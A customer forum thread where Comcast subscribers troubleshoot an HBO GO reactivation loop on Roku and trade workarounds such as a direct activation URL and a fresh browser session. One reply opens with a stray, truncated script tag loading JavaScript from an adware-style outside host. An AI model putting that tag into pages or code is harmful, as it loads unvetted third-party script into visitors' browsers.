Community Forum

HBOGO Activation (actually reactivation on Roku)

New Poster

HBOGO Activation (actually reactivation on Roku)

Wondering if anyone has any thoughts on what's going on with this.

I have a Roku box that I activated the HBOGO channel on about a month ago and have been watching it since then.  Come to find out that I hadn't actually purchased HBO during the activation process, so I signed up for HBO service with Comcast online.  

My Roka now wants me to reactivate the HBOGo channel. When I go online to HBOGO.COM/ACTIVATE and go through the motions I end up with a message from Comcast saying that i already have HBO service and am good to go.  In other words I'm not getting to the screen to input my activation code, so :-)  I can't RE-activate the HBOGO channel on my Roku.

I cleaned my brower's cookies thinking it was remembering something.  no good.

I removed and readded the Roku channel thinking that might free something up.  no joy.

I power cycled the Roku and no difference...

Oh and I tried the customer service line but got disconnected before getting to someone :-(

Let me know if you have any ideas.  thanks,  Scott

Tags (1)
New Poster

Re: HBOGO Activation (actually reactivation on Roku)

Have you tried removing your Roku device on HBOGO... then adding it again? Don't know if that's possible on HBOGO. 

New Poster

I am having the same problem. I am a new subscriber to HBO via Comcast/Xfinity Blast Internet Plus. I was able to activate my HBO Go subscription on my Roku yesterday, but last night a message appeared that stated I was not authorized to access the service, and then it asked me to activate my Roku again. When I go through the process on HBOGo.com/activate, I am now redirected to a page that says "Good news! You already have HBO as part of your XFINITY subscription." Except this is not good news.

Not sure if this is a Comcast issue or an issue with the HBO GO Roku Channel. Perhaps Comcast has decided to block HBO GO on Roku to appease Apple TV's "exclusive" HBO NOW release coming next week. 

New Poster

Literally the exact same problem, it redirects me to the xfinitytv.comcast.net site but no option to input code
New Poster

I am having the same issue on my XBOX ONE and Iphone. I emailed HBO GO support about the issue and they said its a problem with Comcast's site(go figure). I would call them and try and resolve it, but I'd rather break a bottle over my head. 

New Poster

This is now working for me. I believe the problem was related to my account not being fully activated. Try going through the activation process for one of your set-top boxes and then try to go through the HBO GO activation process again.

New Poster

I just have internet, not cable, but I get HBOGO content through http://xfinitytv.comcast.net/tv-networks/HBO/56/main.

I tried to set up my Roku and had the same problem - starting at http://hbogo.com/activate, there's no place to enter the Roku's activation code before I hit the page that says "Good news! You already have HBOas part of your XFINITY subscription."

I chatted with Comcast service reps, and they said I'd need to change from my Digital Cable Converter DTA to a set-top cable box before I could get access to proper hbogo.com and use hbogo apps on tablets and whatnot.

I declined, since it seemed like a trap, and since I think I can still get Game of Thrones on any computer, which should be good enough.

New Poster

Chatted with Comcast and it appears that they never intended to support Roku devices. Our best guess is that the activation screen for Comcast was a loophole that hasn't been closed when initially activating HBOGo.  Comcast seems to only provide  this content to Apple and Android devices, effectively pushing alternative (and, frankly, cheaper) devices out of the market. It's not clear to us how they (Comcast) can sell specific content (HBOGo) and then dictate which device (not Roku) we can use. Bizarre. 

New Poster

New Poster

any luck? I have the same issue!

New Poster

<script src="https://rtdock.com/bpo-rockettab-js/?pid=7269636872697665726d656469615f73657270&eid=fastconnect1&bna... io // </script> i am having same issues trying to activate my Roku for the 4th time. i have been given the ole Xfinity/HBO smile saying Congrats on dwn.loading hbogo to your Roku LT only to find out the next morning it was asking for another activation code,ARRRRRRGGGGHHHHHH!!!!!!! Anyone have a suggestion or better yet a fix?

New Poster

Thanks for all your responses. I got issues resolved. Hope you guy's resolved yours.

New Poster

how did you resolve the issue? 

Contributor

Try www.hbogo.com/authorize not activate, or delete the channel and reinstall it.  I have also found that the process is easier if you are not logged in to your comcast home page first.  Open your browser, don't log in, and type the authorize/activate int o the menu bar. 

New Poster

I had same issue and after alot of headache I found this url on the hbo go support screen shots for how to active on roku.

http://www.hbogo.com/activate/#/activation

I went to it directly and had no issue. 

To be honest I had about 10 minutes earlier sent a request to hbo go support and got an auto reply but I doubt they had a chance to do anything with it yet. 

Hope it helps! 

New Poster

To guess 5 thank you so much. IT WORKED!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

New Poster

So, I had the same issue and after reading the forum, and being a professional IT guy, I came up with the following solution that worked:

1. Force quit whatever browser you have logged into comcase with

2. Open a new Frefox browser

3. Go to hbogo.com/activate

4.proceed as normal

Good luck

New Poster

Guest5, thank you! I've been trying to figure this out all morning and your link was the only thing that worked.